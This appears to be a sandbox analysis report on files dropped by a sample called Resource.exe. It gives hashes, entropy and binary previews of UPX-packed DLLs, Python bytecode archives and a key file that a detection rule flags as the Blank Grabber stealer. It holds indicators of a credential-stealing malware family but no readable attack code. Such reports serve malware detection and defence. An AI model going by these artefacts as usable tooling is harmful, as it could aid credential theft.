                                                                                                                                                                                                                                                            SHA1:C03F112EE2035D0EAAB184AE5F9DB89ACA04273A
                                                                                                                                                                                                                                                            SHA-256:EAF60A9E979C95669D8F209F751725DF385944F347142E0ECDCF2F794D005EAD
                                                                                                                                                                                                                                                            SHA-512:10EEF8FD49E2997542E809C4436AD35DCC6B8A4B9B4313AD54481DAEF5F01296C9C5F6DEDAD93FB620F267AEF46B0208DEFFBAD1903593FD26FD717A030E89E8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1440734
                                                                                                                                                                                                                                                            Entropy (8bit):5.590383253842785
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
                                                                                                                                                                                                                                                            MD5:D220B7E359810266FE6885A169448FA0
                                                                                                                                                                                                                                                            SHA1:556728B326318B992B0DEF059ECA239EB14BA198
                                                                                                                                                                                                                                                            SHA-256:CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
                                                                                                                                                                                                                                                            SHA-512:8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):116958
                                                                                                                                                                                                                                                            Entropy (8bit):7.664460077540289
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:PEVq52IIFfqwtVgrbE6wxdwc3zrvCJNU6R:mq52I0fqoKrw6gdwvU6R
                                                                                                                                                                                                                                                            MD5:F2CC0C763BA120C2C1420682CDAA7A99
                                                                                                                                                                                                                                                            SHA1:2B077F7C760AD047247AAD1E18B2F8E3C420BB67
                                                                                                                                                                                                                                                            SHA-256:E188238654636DC8727A82A72A09E1299F3FB4A3E0E2FE527ABCD6F5AA6CD163
                                                                                                                                                                                                                                                            SHA-512:DBF5CFC35FB8FFC9F7DEEE90C764B77B1628AB376FE2ADE05F688799BD3507A62379ADD66D20A5E38C75B9959564115B22351907EE2B8E2A4AE8B3C0ABF68A99
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:PK........Q.(X..b.h...h.......stub-o.pyc.........4.e..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1629464
                                                                                                                                                                                                                                                            Entropy (8bit):7.952620301087112
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                                                                                            MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                                                                                                            SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                                                                                                            SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                                                                                                            SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):229144
                                                                                                                                                                                                                                                            Entropy (8bit):7.930038440560372
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                                                                                            MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                                                                                                                                                                                                                            SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                                                                                                                                                                                                                            SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                                                                                                                                                                                                                            SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1705240
                                                                                                                                                                                                                                                            Entropy (8bit):7.993600008484676
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:24576:qJY99sOZi/8N8C1CSIJyR4ZRE1Rqq/uQivcHe2Bg5Cmek5CP7uP6zohpLGLZFkh2:FjZiEN8p6ivZUHe2BgcpP7uaor6
                                                                                                                                                                                                                                                            MD5:0B66C50E563D74188A1E96D6617261E8
                                                                                                                                                                                                                                                            SHA1:CFD778B3794B4938E584078CBFAC0747A8916D9E
                                                                                                                                                                                                                                                            SHA-256:02C665F77DB6B255FC62F978AEDBE2092B7EF1926836290DA68FD838DBF2A9F2
                                                                                                                                                                                                                                                            SHA-512:37D710CB5C0CEB5957D11B61684CFBC65951C1D40AB560F3F3CB8FECA42F9D43BD981A0FF44C3CB7562779264F18116723457E79E0E23852D7638B1A954A258F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ..qN.qN.qN.$.O.qN.$...qN.$.K.qN.$.J.qN.$.M.qN....qN...O.qN.qO..pN.B.C.]qN.B.N.qN.B...qN.B.L.qN.Rich.qN.........PE..d......e.........." ...#..........D...]...D...................................^...........`.........................................H.].......].......].......V../..........(.^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                                                            Entropy (8bit):7.44233047444268
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:oUAW1guHrh0h1d4NZa7gJXZjNIVQG86lHQIYiSy1pCQfwug+AM+o/8E9VF0NyciC:ojW1JVpJjNIVQG8S5YiSyv3g+AMxkEdC
                                                                                                                                                                                                                                                            MD5:1E9E36E61651C3AD3E91ABA117EDC8D1
                                                                                                                                                                                                                                                            SHA1:61AB19F15E692704139DB2D7FB3AC00C461F9F8B
                                                                                                                                                                                                                                                            SHA-256:5A91BA7EA3CF48033A85247FC3B1083F497BC060778DCF537CA382A337190093
                                                                                                                                                                                                                                                            SHA-512:B367E00E1A8A3E7AF42D997B59E180DFCA7E31622558398C398F594D619B91CEDC4879BFDDA303D37F31DFCC3447FAA88F65FD13BAC109889CEE8C1E3C1D62D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d......e.........." ...#.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):637720
                                                                                                                                                                                                                                                            Entropy (8bit):7.993300822314004
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:12288:NevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2V4G2:N8oy8x4Rl1dRnxeDlZxsl2MsDVr2
                                                                                                                                                                                                                                                            MD5:C78FAB9114164AC981902C44D3CD9B37
                                                                                                                                                                                                                                                            SHA1:CB34DFF3CF82160731C7DA5527C9F3E7E7F113B7
                                                                                                                                                                                                                                                            SHA-256:4569ACFA25DDA192BECDA0D79F4254CE548A718B566792D73C43931306CC5242
                                                                                                                                                                                                                                                            SHA-512:BF82CCC02248BE669FE4E28D8342B726CF52C4EC2BFE2EC1F71661528E2D8DF03781AE5CCF005A6022D59A90E36CEA7D3C7A495BD11BF149319C891C00AC669B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):302872
                                                                                                                                                                                                                                                            Entropy (8bit):7.986782854548308
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:Kk/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9KiQ/y:KkUfQJbUV2MhCwEQc5Np9zQ6
                                                                                                                                                                                                                                                            MD5:AF87B4AA3862A59D74FF91BE300EE9E3
                                                                                                                                                                                                                                                            SHA1:E5BFD29F92C28AFA79A02DC97A26ED47E4F199B4
                                                                                                                                                                                                                                                            SHA-256:FAC71C7622957FE0773214C7432364D7FC39C5E12250FF9EAAEEA4D897564DC7
                                                                                                                                                                                                                                                            SHA-512:1FB0B8100DFFD18C433C4AA97A4F2DA76FF6E62E2EF2139EDC4F98603BA0BB1C27B310B187B5070CF4E892FFC2D09661A6914DEFA4509C99B60BCBB50F70F4A0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4m..4m..4m..=...2m......6m......9m......<m......7m......7m......6m..4m..em......5m......5m....j.5m......5m..Rich4m..................PE..d......e.........." ...#.`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
